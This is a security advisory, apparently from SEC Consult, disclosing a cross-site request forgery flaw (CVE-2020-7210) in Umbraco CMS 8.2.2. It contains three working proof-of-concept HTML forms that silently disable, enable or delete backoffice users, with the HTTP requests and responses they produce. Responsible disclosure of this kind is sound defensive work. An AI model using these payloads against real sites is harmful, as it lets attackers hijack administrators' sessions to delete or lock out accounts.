=======================================================================
title: Cross-Site Request Forgery (CSRF)
product: Umbraco CMS
vulnerable version: version 8.2.2
fixed version: version 8.5
CVE number: CVE-2020-7210
impact: medium
homepage: https://umbraco.com/
found: October 2019
by: A. Melnikova (Office Moscow)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest
and best
version of Umbraco and a big step forward in regard to making your
work
with Umbraco simpler; simpler to extend, simpler to edit, simpler
to
publish - simpler to use, simpler to enjoy."
Source: https://umbraco.com/products/umbraco-cms/umbraco-8/
Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged
to
immediately upgrade to the latest version available.
SEC Consult recommends to perform a thorough security review
conducted by
security professionals to identify and resolve all security
issues.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary
web
requests with the identity of the victim, without being noticed by
the
victim. This attack always requires some sort of user interaction,
usually
the victim needs to click on an attacker-prepared link or visit a
page
under control of the attacker. Due to this, an attacker is able
to
enable/disable or delete accounts. This may lead to DoS of user
accounts.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be
hosted
on a malicious website, controlled by the attacker.
Example 1: HTML-code for disabling user:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>"
method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Request:
--------
POST
/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>
HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>
Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: <ADMIN-COOKIE>
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close
)]}',
{"notifications":[{"header":"<USERNAME> is now
disabled","message":"","type":3}],"message":"<USERNAME> is
now disabled"}
Example 2: HTML-code for enabling user:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID>"
method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Request:
--------
POST
/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID>
HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>
Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close
)]}',
{"notifications":[{"header":"<USERNAME> is now
enabled","message":"","type":3}],"message":"<USERNAME> is now
enabled"}
Example 3: HTML-code for deleting user:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID>"
method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Request:
--------
POST
/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID>
HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>
Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: <ADMIN-COOKIE>
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close
)]}',
{"notifications":[{"header":"User <USERNAME> was
deleted","message":"","type":3}],"message":"User <USERNAME>
was deleted"}
As soon as an authenticated victim (admin) visits a website with
this HTML code
embedded, the payload would get executed in the context of the
victim's
session. Although responses to these requests are not delivered to
the
attacker, in many cases it is sufficient to be able to compromise
the
integrity of the victim's information stored on the site or to
perform
certain, possibly compromising requests to other sites.
Vulnerable / tested versions:
-----------------------------
The following version was tested and found to be vulnerable:
* version 8.2.2
Vendor contact timeline:
------------------------
2019-11-13: Contacting vendor through
2019-11-13: Requesting encryption keys.
2019-11-14: Encryption issues.
2019-11-15: Encryption issues, sending advisory in unencrypted
form.
2019-11-25: No response, requesting status update.
2019-11-28: Vendor confirmed vulnerability.
2020-01-03: Confirming the release date.
2020-01-14: Release of updated CMS version 8.5.0.
2020-01-23: Release of security advisory.
Solution:
---------
The vendor provides an updated version which should be installed
immediately:
https://our.umbraco.com/download/releases/850
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC
Consult. It
ensures the continued knowledge gain of SEC Consult in the field of
network
and application security to stay ahead of the attacker. The SEC
Consult
Vulnerability Lab supports high-quality penetration testing and the
evaluation
of new offensive and defensive technologies for our customers.
Hence our
customers obtain the most current information about vulnerabilities
and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application
https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of
SEC Consult?
Contact our local offices
https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF A. Melnikova / @2020